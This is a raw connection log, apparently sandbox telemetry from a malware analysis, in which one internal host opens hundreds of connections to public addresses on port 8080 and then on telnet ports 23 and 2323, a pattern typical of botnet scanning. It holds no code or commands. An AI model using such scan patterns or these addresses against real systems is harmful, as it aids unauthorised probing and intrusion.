Feb 14, 2024 09:28:46.388997078 CET	6752	8080	192.168.2.15	95.108.18.89
Feb 14, 2024 09:28:46.388997078 CET	6752	8080	192.168.2.15	62.91.182.55
Feb 14, 2024 09:28:46.389017105 CET	6752	8080	192.168.2.15	94.125.12.34
Feb 14, 2024 09:28:46.389022112 CET	6752	8080	192.168.2.15	31.96.249.187
Feb 14, 2024 09:28:46.389029980 CET	6752	8080	192.168.2.15	85.2.194.101
Feb 14, 2024 09:28:46.389039993 CET	6752	8080	192.168.2.15	95.164.33.143
Feb 14, 2024 09:28:46.389059067 CET	6752	8080	192.168.2.15	94.213.134.207
Feb 14, 2024 09:28:46.389059067 CET	6752	8080	192.168.2.15	62.76.199.238
Feb 14, 2024 09:28:46.389070988 CET	6752	8080	192.168.2.15	95.25.81.140
Feb 14, 2024 09:28:46.389086962 CET	6752	8080	192.168.2.15	31.45.12.36
Feb 14, 2024 09:28:46.389095068 CET	6752	8080	192.168.2.15	95.130.246.100
Feb 14, 2024 09:28:46.389116049 CET	6752	8080	192.168.2.15	31.17.201.171
Feb 14, 2024 09:28:46.389121056 CET	6752	8080	192.168.2.15	85.78.2.19
Feb 14, 2024 09:28:46.389125109 CET	6752	8080	192.168.2.15	62.73.235.226
Feb 14, 2024 09:28:46.389131069 CET	6752	8080	192.168.2.15	95.198.94.92
Feb 14, 2024 09:28:46.389142990 CET	6752	8080	192.168.2.15	85.86.14.5
Feb 14, 2024 09:28:46.389157057 CET	6752	8080	192.168.2.15	85.108.69.141
Feb 14, 2024 09:28:46.389157057 CET	6752	8080	192.168.2.15	31.51.172.206
Feb 14, 2024 09:28:46.389174938 CET	6752	8080	192.168.2.15	85.158.242.205
Feb 14, 2024 09:28:46.389185905 CET	6752	8080	192.168.2.15	85.210.42.108
Feb 14, 2024 09:28:46.389188051 CET	6752	8080	192.168.2.15	62.119.85.45
Feb 14, 2024 09:28:46.389199972 CET	6752	8080	192.168.2.15	85.113.213.167
Feb 14, 2024 09:28:46.389199972 CET	6752	8080	192.168.2.15	95.190.47.150
Feb 14, 2024 09:28:46.389230013 CET	6752	8080	192.168.2.15	31.185.89.220
Feb 14, 2024 09:28:46.389245033 CET	6752	8080	192.168.2.15	94.74.162.167
Feb 14, 2024 09:28:46.389245033 CET	6752	8080	192.168.2.15	31.144.91.190
Feb 14, 2024 09:28:46.389255047 CET	6752	8080	192.168.2.15	31.50.152.163
Feb 14, 2024 09:28:46.389278889 CET	6752	8080	192.168.2.15	85.27.207.200
Feb 14, 2024 09:28:46.389285088 CET	6752	8080	192.168.2.15	85.49.207.76
Feb 14, 2024 09:28:46.389297009 CET	6752	8080	192.168.2.15	94.15.45.95
Feb 14, 2024 09:28:46.389302015 CET	6752	8080	192.168.2.15	94.166.32.103
Feb 14, 2024 09:28:46.389312029 CET	6752	8080	192.168.2.15	62.212.128.227
Feb 14, 2024 09:28:46.389328957 CET	6752	8080	192.168.2.15	85.146.172.125
Feb 14, 2024 09:28:46.389328957 CET	6752	8080	192.168.2.15	31.136.148.111
Feb 14, 2024 09:28:46.389328957 CET	6752	8080	192.168.2.15	94.231.183.91
Feb 14, 2024 09:28:46.389338017 CET	6752	8080	192.168.2.15	85.239.189.154
Feb 14, 2024 09:28:46.389338970 CET	6752	8080	192.168.2.15	94.76.116.115
Feb 14, 2024 09:28:46.389352083 CET	6752	8080	192.168.2.15	94.142.217.145
Feb 14, 2024 09:28:46.389363050 CET	6752	8080	192.168.2.15	31.83.160.116
Feb 14, 2024 09:28:46.389367104 CET	6752	8080	192.168.2.15	95.199.159.104
Feb 14, 2024 09:28:46.389384985 CET	6752	8080	192.168.2.15	95.89.64.223
Feb 14, 2024 09:28:46.389386892 CET	6752	8080	192.168.2.15	94.110.240.243
Feb 14, 2024 09:28:46.389390945 CET	6752	8080	192.168.2.15	62.182.11.230
Feb 14, 2024 09:28:46.389393091 CET	6752	8080	192.168.2.15	85.189.141.103
Feb 14, 2024 09:28:46.389410973 CET	6752	8080	192.168.2.15	85.200.111.141
Feb 14, 2024 09:28:46.389456034 CET	6752	8080	192.168.2.15	95.252.25.76
Feb 14, 2024 09:28:46.389489889 CET	6752	8080	192.168.2.15	85.85.191.158
Feb 14, 2024 09:28:46.389492989 CET	6752	8080	192.168.2.15	31.107.139.159
Feb 14, 2024 09:28:46.389493942 CET	6752	8080	192.168.2.15	31.253.115.171
Feb 14, 2024 09:28:46.389493942 CET	6752	8080	192.168.2.15	85.86.174.114
Feb 14, 2024 09:28:46.389494896 CET	6752	8080	192.168.2.15	31.102.57.236
Feb 14, 2024 09:28:46.389523029 CET	6752	8080	192.168.2.15	94.230.151.164
Feb 14, 2024 09:28:46.389523029 CET	6752	8080	192.168.2.15	85.53.164.166
Feb 14, 2024 09:28:46.389523029 CET	6752	8080	192.168.2.15	31.208.212.29
Feb 14, 2024 09:28:46.389547110 CET	6752	8080	192.168.2.15	94.223.190.163
Feb 14, 2024 09:28:46.389547110 CET	6752	8080	192.168.2.15	85.239.36.55
Feb 14, 2024 09:28:46.389564037 CET	6752	8080	192.168.2.15	85.241.239.159
Feb 14, 2024 09:28:46.389564037 CET	6752	8080	192.168.2.15	85.107.20.74
Feb 14, 2024 09:28:46.389564991 CET	6752	8080	192.168.2.15	94.99.122.178
Feb 14, 2024 09:28:46.389565945 CET	6752	8080	192.168.2.15	62.235.220.228
Feb 14, 2024 09:28:46.389565945 CET	6752	8080	192.168.2.15	62.143.56.105
Feb 14, 2024 09:28:46.389566898 CET	6752	8080	192.168.2.15	95.158.164.228
Feb 14, 2024 09:28:46.389566898 CET	6752	8080	192.168.2.15	62.233.52.41
Feb 14, 2024 09:28:46.389566898 CET	6752	8080	192.168.2.15	85.238.131.192
Feb 14, 2024 09:28:46.389568090 CET	6752	8080	192.168.2.15	31.114.80.211
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	62.8.144.32
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	95.173.149.64
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	94.136.140.140
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	62.48.28.11
Feb 14, 2024 09:28:46.389568090 CET	6752	8080	192.168.2.15	94.70.61.101
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	31.47.14.255
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	85.46.195.227
Feb 14, 2024 09:28:46.389568090 CET	6752	8080	192.168.2.15	62.168.63.252
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	31.187.2.253
Feb 14, 2024 09:28:46.389568090 CET	6752	8080	192.168.2.15	94.171.230.195
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	85.44.248.253
Feb 14, 2024 09:28:46.389568090 CET	6752	8080	192.168.2.15	95.108.201.187
Feb 14, 2024 09:28:46.389569044 CET	6752	8080	192.168.2.15	95.225.34.161
Feb 14, 2024 09:28:46.389589071 CET	6752	8080	192.168.2.15	95.88.29.112
Feb 14, 2024 09:28:46.389589071 CET	6752	8080	192.168.2.15	85.119.25.9
Feb 14, 2024 09:28:46.389590979 CET	6752	8080	192.168.2.15	85.251.151.241
Feb 14, 2024 09:28:46.389590979 CET	6752	8080	192.168.2.15	31.144.209.41
Feb 14, 2024 09:28:46.389591932 CET	6752	8080	192.168.2.15	94.165.29.205
Feb 14, 2024 09:28:46.389594078 CET	6752	8080	192.168.2.15	31.191.127.152
Feb 14, 2024 09:28:46.389640093 CET	6752	8080	192.168.2.15	62.31.240.127
Feb 14, 2024 09:28:46.389640093 CET	6752	8080	192.168.2.15	31.175.155.82
Feb 14, 2024 09:28:46.389640093 CET	6752	8080	192.168.2.15	62.247.138.83
Feb 14, 2024 09:28:46.389640093 CET	6752	8080	192.168.2.15	62.173.247.227
Feb 14, 2024 09:28:46.389640093 CET	6752	8080	192.168.2.15	95.146.108.39
Feb 14, 2024 09:28:46.389647007 CET	6752	8080	192.168.2.15	31.75.51.43
Feb 14, 2024 09:28:46.389647007 CET	6752	8080	192.168.2.15	95.181.64.223
Feb 14, 2024 09:28:46.389647007 CET	6752	8080	192.168.2.15	94.194.32.230
Feb 14, 2024 09:28:46.389647007 CET	6752	8080	192.168.2.15	95.130.122.88
Feb 14, 2024 09:28:46.389647007 CET	6752	8080	192.168.2.15	31.162.98.194
Feb 14, 2024 09:28:46.389647007 CET	6752	8080	192.168.2.15	31.0.251.14
Feb 14, 2024 09:28:46.389647007 CET	6752	8080	192.168.2.15	31.63.161.238
Feb 14, 2024 09:28:46.389647007 CET	6752	8080	192.168.2.15	94.123.65.84
Feb 14, 2024 09:28:46.389658928 CET	6752	8080	192.168.2.15	95.138.253.89
Feb 14, 2024 09:28:46.389658928 CET	6752	8080	192.168.2.15	62.53.128.53
Feb 14, 2024 09:28:46.389658928 CET	6752	8080	192.168.2.15	31.26.120.144
Feb 14, 2024 09:28:46.389658928 CET	6752	8080	192.168.2.15	95.170.35.251
Feb 14, 2024 09:28:46.389658928 CET	6752	8080	192.168.2.15	85.121.121.28
Feb 14, 2024 09:28:46.389662027 CET	6752	8080	192.168.2.15	85.248.68.38
Feb 14, 2024 09:28:46.389662981 CET	6752	8080	192.168.2.15	31.16.135.37
Feb 14, 2024 09:28:46.389662027 CET	6752	8080	192.168.2.15	31.213.23.178
Feb 14, 2024 09:28:46.389666080 CET	6752	8080	192.168.2.15	94.170.112.63
Feb 14, 2024 09:28:46.389662027 CET	6752	8080	192.168.2.15	85.191.74.34
Feb 14, 2024 09:28:46.389666080 CET	6752	8080	192.168.2.15	85.80.50.22
Feb 14, 2024 09:28:46.389662027 CET	6752	8080	192.168.2.15	94.194.137.128
Feb 14, 2024 09:28:46.389666080 CET	6752	8080	192.168.2.15	31.38.81.66
Feb 14, 2024 09:28:46.389662027 CET	6752	8080	192.168.2.15	95.12.42.70
Feb 14, 2024 09:28:46.389667034 CET	6752	8080	192.168.2.15	31.252.228.154
Feb 14, 2024 09:28:46.389662027 CET	6752	8080	192.168.2.15	62.163.187.92
Feb 14, 2024 09:28:46.389667034 CET	6752	8080	192.168.2.15	62.105.172.32
Feb 14, 2024 09:28:46.389669895 CET	6752	8080	192.168.2.15	94.191.36.98
Feb 14, 2024 09:28:46.389671087 CET	6752	8080	192.168.2.15	31.198.170.222
Feb 14, 2024 09:28:46.389667034 CET	6752	8080	192.168.2.15	62.208.199.90
Feb 14, 2024 09:28:46.389671087 CET	6752	8080	192.168.2.15	95.66.6.189
Feb 14, 2024 09:28:46.389717102 CET	6752	8080	192.168.2.15	85.12.199.211
Feb 14, 2024 09:28:46.389717102 CET	6752	8080	192.168.2.15	62.97.223.160
Feb 14, 2024 09:28:46.389725924 CET	6752	8080	192.168.2.15	62.189.223.19
Feb 14, 2024 09:28:46.389725924 CET	6752	8080	192.168.2.15	85.62.139.179
Feb 14, 2024 09:28:46.389731884 CET	6752	8080	192.168.2.15	85.140.216.68
Feb 14, 2024 09:28:46.389734030 CET	6752	8080	192.168.2.15	31.255.111.180
Feb 14, 2024 09:28:46.389731884 CET	6752	8080	192.168.2.15	31.190.60.223
Feb 14, 2024 09:28:46.389734030 CET	6752	8080	192.168.2.15	31.1.9.105
Feb 14, 2024 09:28:46.389733076 CET	6752	8080	192.168.2.15	62.96.132.165
Feb 14, 2024 09:28:46.389733076 CET	6752	8080	192.168.2.15	85.219.10.86
Feb 14, 2024 09:28:46.389733076 CET	6752	8080	192.168.2.15	85.99.133.218
Feb 14, 2024 09:28:46.389738083 CET	6752	8080	192.168.2.15	62.43.219.15
Feb 14, 2024 09:28:46.389738083 CET	6752	8080	192.168.2.15	31.87.132.50
Feb 14, 2024 09:28:46.389738083 CET	6752	8080	192.168.2.15	94.235.201.18
Feb 14, 2024 09:28:46.389754057 CET	6752	8080	192.168.2.15	95.208.152.218
Feb 14, 2024 09:28:46.389754057 CET	6752	8080	192.168.2.15	31.42.66.216
Feb 14, 2024 09:28:46.389754057 CET	6752	8080	192.168.2.15	85.84.176.96
Feb 14, 2024 09:28:46.389754057 CET	6752	8080	192.168.2.15	95.197.23.82
Feb 14, 2024 09:28:46.389754057 CET	6752	8080	192.168.2.15	94.221.8.63
Feb 14, 2024 09:28:46.389754057 CET	6752	8080	192.168.2.15	94.11.19.153
Feb 14, 2024 09:28:46.389767885 CET	6752	8080	192.168.2.15	94.125.71.13
Feb 14, 2024 09:28:46.389767885 CET	6752	8080	192.168.2.15	95.32.65.181
Feb 14, 2024 09:28:46.389799118 CET	6752	8080	192.168.2.15	94.107.139.45
Feb 14, 2024 09:28:46.389799118 CET	6752	8080	192.168.2.15	95.82.59.4
Feb 14, 2024 09:28:46.389799118 CET	6752	8080	192.168.2.15	62.57.78.250
Feb 14, 2024 09:28:46.389807940 CET	6752	8080	192.168.2.15	95.69.136.40
Feb 14, 2024 09:28:46.389807940 CET	6752	8080	192.168.2.15	95.238.127.178
Feb 14, 2024 09:28:46.389807940 CET	6752	8080	192.168.2.15	95.33.56.82
Feb 14, 2024 09:28:46.389810085 CET	6752	8080	192.168.2.15	85.237.87.78
Feb 14, 2024 09:28:46.389807940 CET	6752	8080	192.168.2.15	62.198.183.103
Feb 14, 2024 09:28:46.389813900 CET	6752	8080	192.168.2.15	94.189.68.229
Feb 14, 2024 09:28:46.389811039 CET	6752	8080	192.168.2.15	31.85.229.115
Feb 14, 2024 09:28:46.389813900 CET	6752	8080	192.168.2.15	62.195.42.31
Feb 14, 2024 09:28:46.389812946 CET	6752	8080	192.168.2.15	85.248.243.93
Feb 14, 2024 09:28:46.389811039 CET	6752	8080	192.168.2.15	95.13.184.112
Feb 14, 2024 09:28:46.389813900 CET	6752	8080	192.168.2.15	94.181.150.23
Feb 14, 2024 09:28:46.389812946 CET	6752	8080	192.168.2.15	31.101.175.171
Feb 14, 2024 09:28:46.389813900 CET	6752	8080	192.168.2.15	62.222.215.160
Feb 14, 2024 09:28:46.389811039 CET	6752	8080	192.168.2.15	94.26.240.178
Feb 14, 2024 09:28:46.389822960 CET	6752	8080	192.168.2.15	62.73.189.187
Feb 14, 2024 09:28:46.389812946 CET	6752	8080	192.168.2.15	85.141.13.150
Feb 14, 2024 09:28:46.389822960 CET	6752	8080	192.168.2.15	95.33.213.214
Feb 14, 2024 09:28:46.389813900 CET	6752	8080	192.168.2.15	94.156.14.31
Feb 14, 2024 09:28:46.389811039 CET	6752	8080	192.168.2.15	31.122.35.154
Feb 14, 2024 09:28:46.389812946 CET	6752	8080	192.168.2.15	31.143.254.208
Feb 14, 2024 09:28:46.389811039 CET	6752	8080	192.168.2.15	94.62.7.94
Feb 14, 2024 09:28:46.389822960 CET	6752	8080	192.168.2.15	95.87.66.221
Feb 14, 2024 09:28:46.389811039 CET	6752	8080	192.168.2.15	31.154.53.11
Feb 14, 2024 09:28:46.389867067 CET	6752	8080	192.168.2.15	62.108.185.12
Feb 14, 2024 09:28:46.389867067 CET	6752	8080	192.168.2.15	95.124.239.141
Feb 14, 2024 09:28:46.389867067 CET	6752	8080	192.168.2.15	31.130.112.195
Feb 14, 2024 09:28:46.389867067 CET	6752	8080	192.168.2.15	31.237.39.60
Feb 14, 2024 09:28:46.389867067 CET	6752	8080	192.168.2.15	85.82.124.55
Feb 14, 2024 09:28:46.389867067 CET	6752	8080	192.168.2.15	95.255.48.239
Feb 14, 2024 09:28:46.389867067 CET	6752	8080	192.168.2.15	31.221.40.203
Feb 14, 2024 09:28:46.389883995 CET	6752	8080	192.168.2.15	31.58.131.96
Feb 14, 2024 09:28:46.389883995 CET	6752	8080	192.168.2.15	85.59.84.60
Feb 14, 2024 09:28:46.389893055 CET	6752	8080	192.168.2.15	85.23.88.243
Feb 14, 2024 09:28:46.389893055 CET	6752	8080	192.168.2.15	95.237.185.108
Feb 14, 2024 09:28:46.389893055 CET	6752	8080	192.168.2.15	62.26.69.223
Feb 14, 2024 09:28:46.389894962 CET	6752	8080	192.168.2.15	94.42.17.46
Feb 14, 2024 09:28:46.389883995 CET	6752	8080	192.168.2.15	94.206.63.33
Feb 14, 2024 09:28:46.389894962 CET	6752	8080	192.168.2.15	95.154.160.77
Feb 14, 2024 09:28:46.389898062 CET	6752	8080	192.168.2.15	62.196.128.125
Feb 14, 2024 09:28:46.389897108 CET	6752	8080	192.168.2.15	31.252.96.62
Feb 14, 2024 09:28:46.389894962 CET	6752	8080	192.168.2.15	95.61.90.83
Feb 14, 2024 09:28:46.389897108 CET	6752	8080	192.168.2.15	95.126.17.33
Feb 14, 2024 09:28:46.389894962 CET	6752	8080	192.168.2.15	62.228.131.72
Feb 14, 2024 09:28:46.389883995 CET	6752	8080	192.168.2.15	31.1.121.171
Feb 14, 2024 09:28:46.389894962 CET	6752	8080	192.168.2.15	85.222.26.2
Feb 14, 2024 09:28:46.389899015 CET	6752	8080	192.168.2.15	31.175.83.96
Feb 14, 2024 09:28:46.389898062 CET	6752	8080	192.168.2.15	31.207.184.105
Feb 14, 2024 09:28:46.389899015 CET	6752	8080	192.168.2.15	31.141.66.233
Feb 14, 2024 09:28:46.389893055 CET	6752	8080	192.168.2.15	85.184.88.207
Feb 14, 2024 09:28:46.389898062 CET	6752	8080	192.168.2.15	31.175.175.191
Feb 14, 2024 09:28:46.389883995 CET	6752	8080	192.168.2.15	94.247.216.2
Feb 14, 2024 09:28:46.389899015 CET	6752	8080	192.168.2.15	85.254.219.238
Feb 14, 2024 09:28:46.389899015 CET	6752	8080	192.168.2.15	85.154.91.41
Feb 14, 2024 09:28:46.389883995 CET	6752	8080	192.168.2.15	85.125.135.190
Feb 14, 2024 09:28:46.389897108 CET	6752	8080	192.168.2.15	62.128.238.20
Feb 14, 2024 09:28:46.389883995 CET	6752	8080	192.168.2.15	94.194.230.222
Feb 14, 2024 09:28:46.389893055 CET	6752	8080	192.168.2.15	95.8.89.194
Feb 14, 2024 09:28:46.389897108 CET	6752	8080	192.168.2.15	94.181.22.244
Feb 14, 2024 09:28:46.389893055 CET	6752	8080	192.168.2.15	62.246.52.23
Feb 14, 2024 09:28:46.389921904 CET	6752	8080	192.168.2.15	31.8.203.64
Feb 14, 2024 09:28:46.389898062 CET	6752	8080	192.168.2.15	31.120.59.53
Feb 14, 2024 09:28:46.389898062 CET	6752	8080	192.168.2.15	95.46.166.204
Feb 14, 2024 09:28:46.389898062 CET	6752	8080	192.168.2.15	94.252.176.43
Feb 14, 2024 09:28:46.389898062 CET	6752	8080	192.168.2.15	31.50.231.94
Feb 14, 2024 09:28:46.389960051 CET	6752	8080	192.168.2.15	62.110.134.143
Feb 14, 2024 09:28:46.389960051 CET	6752	8080	192.168.2.15	94.228.43.130
Feb 14, 2024 09:28:46.389964104 CET	6752	8080	192.168.2.15	62.98.167.167
Feb 14, 2024 09:28:46.389965057 CET	6752	8080	192.168.2.15	95.154.89.127
Feb 14, 2024 09:28:46.389965057 CET	6752	8080	192.168.2.15	62.222.5.73
Feb 14, 2024 09:28:46.389965057 CET	6752	8080	192.168.2.15	94.37.162.178
Feb 14, 2024 09:28:46.389966965 CET	6752	8080	192.168.2.15	85.14.194.172
Feb 14, 2024 09:28:46.389966965 CET	6752	8080	192.168.2.15	95.53.238.181
Feb 14, 2024 09:28:46.389967918 CET	6752	8080	192.168.2.15	94.227.91.69
Feb 14, 2024 09:28:46.389969110 CET	6752	8080	192.168.2.15	95.167.60.10
Feb 14, 2024 09:28:46.389969110 CET	6752	8080	192.168.2.15	95.198.47.139
Feb 14, 2024 09:28:46.389969110 CET	6752	8080	192.168.2.15	94.198.48.181
Feb 14, 2024 09:28:46.389969110 CET	6752	8080	192.168.2.15	62.250.101.92
Feb 14, 2024 09:28:46.389969110 CET	6752	8080	192.168.2.15	31.175.51.101
Feb 14, 2024 09:28:46.389969110 CET	6752	8080	192.168.2.15	85.23.216.169
Feb 14, 2024 09:28:46.389976025 CET	6752	8080	192.168.2.15	31.213.27.160
Feb 14, 2024 09:28:46.389976025 CET	6752	8080	192.168.2.15	31.167.192.42
Feb 14, 2024 09:28:46.389976025 CET	6752	8080	192.168.2.15	94.255.170.219
Feb 14, 2024 09:28:46.389976025 CET	6752	8080	192.168.2.15	62.139.91.248
Feb 14, 2024 09:28:46.389976025 CET	6752	8080	192.168.2.15	62.251.168.217
Feb 14, 2024 09:28:46.389980078 CET	6752	8080	192.168.2.15	95.199.208.85
Feb 14, 2024 09:28:46.389980078 CET	6752	8080	192.168.2.15	94.93.63.61
Feb 14, 2024 09:28:46.389980078 CET	6752	8080	192.168.2.15	31.0.194.217
Feb 14, 2024 09:28:46.389993906 CET	6752	8080	192.168.2.15	95.146.61.176
Feb 14, 2024 09:28:46.389993906 CET	6752	8080	192.168.2.15	94.241.126.26
Feb 14, 2024 09:28:46.389996052 CET	6752	8080	192.168.2.15	62.184.214.24
Feb 14, 2024 09:28:46.389996052 CET	6752	8080	192.168.2.15	95.209.223.4
Feb 14, 2024 09:28:46.389997005 CET	6752	8080	192.168.2.15	85.36.23.86
Feb 14, 2024 09:28:46.389997005 CET	6752	8080	192.168.2.15	94.204.245.94
Feb 14, 2024 09:28:46.389998913 CET	6752	8080	192.168.2.15	31.154.249.218
Feb 14, 2024 09:28:46.389998913 CET	6752	8080	192.168.2.15	95.142.63.1
Feb 14, 2024 09:28:46.390007019 CET	6752	8080	192.168.2.15	95.142.245.162
Feb 14, 2024 09:28:46.390007019 CET	6752	8080	192.168.2.15	31.170.231.113
Feb 14, 2024 09:28:46.390007019 CET	6752	8080	192.168.2.15	62.134.114.40
Feb 14, 2024 09:28:46.390007019 CET	6752	8080	192.168.2.15	94.138.243.209
Feb 14, 2024 09:28:46.390007019 CET	6752	8080	192.168.2.15	94.158.96.119
Feb 14, 2024 09:28:46.390007019 CET	6752	8080	192.168.2.15	94.45.230.165
Feb 14, 2024 09:28:46.390007019 CET	6752	8080	192.168.2.15	95.232.96.52
Feb 14, 2024 09:28:46.390007019 CET	6752	8080	192.168.2.15	31.212.155.110
Feb 14, 2024 09:28:46.390016079 CET	6752	8080	192.168.2.15	31.220.126.220
Feb 14, 2024 09:28:46.390023947 CET	6752	8080	192.168.2.15	31.251.212.36
Feb 14, 2024 09:28:46.390023947 CET	6752	8080	192.168.2.15	95.109.109.100
Feb 14, 2024 09:28:46.390023947 CET	6752	8080	192.168.2.15	62.93.138.177
Feb 14, 2024 09:28:46.390028000 CET	6752	8080	192.168.2.15	95.100.190.197
Feb 14, 2024 09:28:46.390028000 CET	6752	8080	192.168.2.15	94.221.242.141
Feb 14, 2024 09:28:46.390059948 CET	6752	8080	192.168.2.15	31.169.79.191
Feb 14, 2024 09:28:46.390060902 CET	6752	8080	192.168.2.15	95.7.163.101
Feb 14, 2024 09:28:46.390235901 CET	58896	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:46.390326023 CET	38508	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:46.390347004 CET	38974	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:46.426021099 CET	1184	23	192.168.2.15	67.49.100.1
Feb 14, 2024 09:28:46.426028013 CET	1184	2323	192.168.2.15	136.168.126.77
Feb 14, 2024 09:28:46.426028967 CET	1184	23	192.168.2.15	54.71.142.51
Feb 14, 2024 09:28:46.426040888 CET	1184	23	192.168.2.15	64.229.29.74
Feb 14, 2024 09:28:46.426059961 CET	1184	23	192.168.2.15	198.210.223.82
Feb 14, 2024 09:28:46.426063061 CET	1184	23	192.168.2.15	71.28.84.181
Feb 14, 2024 09:28:46.426075935 CET	1184	23	192.168.2.15	37.79.100.55
Feb 14, 2024 09:28:46.426090002 CET	1184	23	192.168.2.15	207.108.13.135
Feb 14, 2024 09:28:46.426090002 CET	1184	23	192.168.2.15	51.201.149.47
Feb 14, 2024 09:28:46.426117897 CET	1184	2323	192.168.2.15	74.239.82.146
Feb 14, 2024 09:28:46.426120996 CET	1184	23	192.168.2.15	99.200.76.196
Feb 14, 2024 09:28:46.426126003 CET	1184	23	192.168.2.15	192.134.47.220
Feb 14, 2024 09:28:46.426134109 CET	1184	23	192.168.2.15	84.255.108.183
Feb 14, 2024 09:28:46.426145077 CET	1184	23	192.168.2.15	170.60.231.101
Feb 14, 2024 09:28:46.426152945 CET	1184	23	192.168.2.15	4.133.72.126
Feb 14, 2024 09:28:46.426167011 CET	1184	23	192.168.2.15	165.207.30.53
Feb 14, 2024 09:28:46.426177025 CET	1184	23	192.168.2.15	157.107.222.107
Feb 14, 2024 09:28:46.426191092 CET	1184	23	192.168.2.15	147.77.212.19
Feb 14, 2024 09:28:46.426191092 CET	1184	23	192.168.2.15	72.237.186.85
Feb 14, 2024 09:28:46.426191092 CET	1184	23	192.168.2.15	86.178.59.220
Feb 14, 2024 09:28:46.426217079 CET	1184	23	192.168.2.15	175.191.131.60
Feb 14, 2024 09:28:46.426227093 CET	1184	23	192.168.2.15	173.26.213.40
Feb 14, 2024 09:28:46.426235914 CET	1184	23	192.168.2.15	195.129.39.110
Feb 14, 2024 09:28:46.426237106 CET	1184	23	192.168.2.15	70.235.67.73
Feb 14, 2024 09:28:46.426237106 CET	1184	2323	192.168.2.15	51.109.93.1
Feb 14, 2024 09:28:46.426239967 CET	1184	23	192.168.2.15	209.206.70.98
Feb 14, 2024 09:28:46.426237106 CET	1184	23	192.168.2.15	194.30.221.74
Feb 14, 2024 09:28:46.426246881 CET	1184	23	192.168.2.15	150.151.221.108
Feb 14, 2024 09:28:46.426264048 CET	1184	2323	192.168.2.15	200.77.254.23
Feb 14, 2024 09:28:46.426280022 CET	1184	23	192.168.2.15	165.47.170.239
Feb 14, 2024 09:28:46.426280975 CET	1184	23	192.168.2.15	25.46.226.96
Feb 14, 2024 09:28:46.426280975 CET	1184	23	192.168.2.15	192.180.64.157
Feb 14, 2024 09:28:46.426282883 CET	1184	23	192.168.2.15	173.182.245.109
Feb 14, 2024 09:28:46.426306963 CET	1184	23	192.168.2.15	160.49.55.7
Feb 14, 2024 09:28:46.426312923 CET	1184	23	192.168.2.15	221.214.117.36
Feb 14, 2024 09:28:46.426315069 CET	1184	23	192.168.2.15	104.104.20.122
Feb 14, 2024 09:28:46.426316023 CET	1184	23	192.168.2.15	106.23.109.78
Feb 14, 2024 09:28:46.426316023 CET	1184	23	192.168.2.15	89.138.9.216
Feb 14, 2024 09:28:46.426317930 CET	1184	23	192.168.2.15	213.200.76.224
Feb 14, 2024 09:28:46.426321030 CET	1184	23	192.168.2.15	145.124.154.29
Feb 14, 2024 09:28:46.426336050 CET	1184	23	192.168.2.15	168.119.226.82
Feb 14, 2024 09:28:46.426337004 CET	1184	23	192.168.2.15	160.27.78.181
Feb 14, 2024 09:28:46.426342010 CET	1184	2323	192.168.2.15	136.188.248.248
Feb 14, 2024 09:28:46.426342010 CET	1184	23	192.168.2.15	143.80.149.3
Feb 14, 2024 09:28:46.426357985 CET	1184	23	192.168.2.15	64.210.125.32
Feb 14, 2024 09:28:46.426371098 CET	1184	23	192.168.2.15	168.148.217.81
Feb 14, 2024 09:28:46.426381111 CET	1184	23	192.168.2.15	219.187.44.233
Feb 14, 2024 09:28:46.426393032 CET	1184	23	192.168.2.15	219.204.121.232
Feb 14, 2024 09:28:46.426395893 CET	1184	23	192.168.2.15	162.58.107.63
Feb 14, 2024 09:28:46.426402092 CET	1184	23	192.168.2.15	101.149.247.5
Feb 14, 2024 09:28:46.426409960 CET	1184	2323	192.168.2.15	52.129.207.125
Feb 14, 2024 09:28:46.426424980 CET	1184	23	192.168.2.15	212.112.101.147
Feb 14, 2024 09:28:46.426425934 CET	1184	23	192.168.2.15	153.196.160.49
Feb 14, 2024 09:28:46.426434994 CET	1184	23	192.168.2.15	116.164.247.167
Feb 14, 2024 09:28:46.426446915 CET	1184	23	192.168.2.15	108.67.6.153
Feb 14, 2024 09:28:46.426449060 CET	1184	23	192.168.2.15	75.40.187.248
Feb 14, 2024 09:28:46.426462889 CET	1184	23	192.168.2.15	36.110.138.63
Feb 14, 2024 09:28:46.426464081 CET	1184	23	192.168.2.15	133.244.73.83
Feb 14, 2024 09:28:46.426470995 CET	1184	23	192.168.2.15	31.115.44.37
Feb 14, 2024 09:28:46.426486969 CET	1184	23	192.168.2.15	211.239.70.192
Feb 14, 2024 09:28:46.426486969 CET	1184	2323	192.168.2.15	53.100.31.115
Feb 14, 2024 09:28:46.426501989 CET	1184	23	192.168.2.15	151.194.221.138
Feb 14, 2024 09:28:46.426516056 CET	1184	23	192.168.2.15	172.60.172.219
Feb 14, 2024 09:28:46.426517010 CET	1184	23	192.168.2.15	188.143.182.133
Feb 14, 2024 09:28:46.426533937 CET	1184	23	192.168.2.15	161.254.83.140
Feb 14, 2024 09:28:46.426548004 CET	1184	23	192.168.2.15	185.197.251.186
Feb 14, 2024 09:28:46.426549911 CET	1184	23	192.168.2.15	167.9.210.79
Feb 14, 2024 09:28:46.426552057 CET	1184	23	192.168.2.15	222.8.134.132
Feb 14, 2024 09:28:46.426565886 CET	1184	23	192.168.2.15	113.118.128.103
Feb 14, 2024 09:28:46.426568985 CET	1184	23	192.168.2.15	141.165.117.181
Feb 14, 2024 09:28:46.426578045 CET	1184	2323	192.168.2.15	160.210.195.98
Feb 14, 2024 09:28:46.426588058 CET	1184	23	192.168.2.15	162.59.66.220
Feb 14, 2024 09:28:46.426601887 CET	1184	23	192.168.2.15	106.14.217.120
Feb 14, 2024 09:28:46.426606894 CET	1184	23	192.168.2.15	199.211.88.80
Feb 14, 2024 09:28:46.426619053 CET	1184	23	192.168.2.15	191.132.8.191
Feb 14, 2024 09:28:46.426630974 CET	1184	23	192.168.2.15	188.17.59.231
Feb 14, 2024 09:28:46.426630974 CET	1184	23	192.168.2.15	175.243.232.128
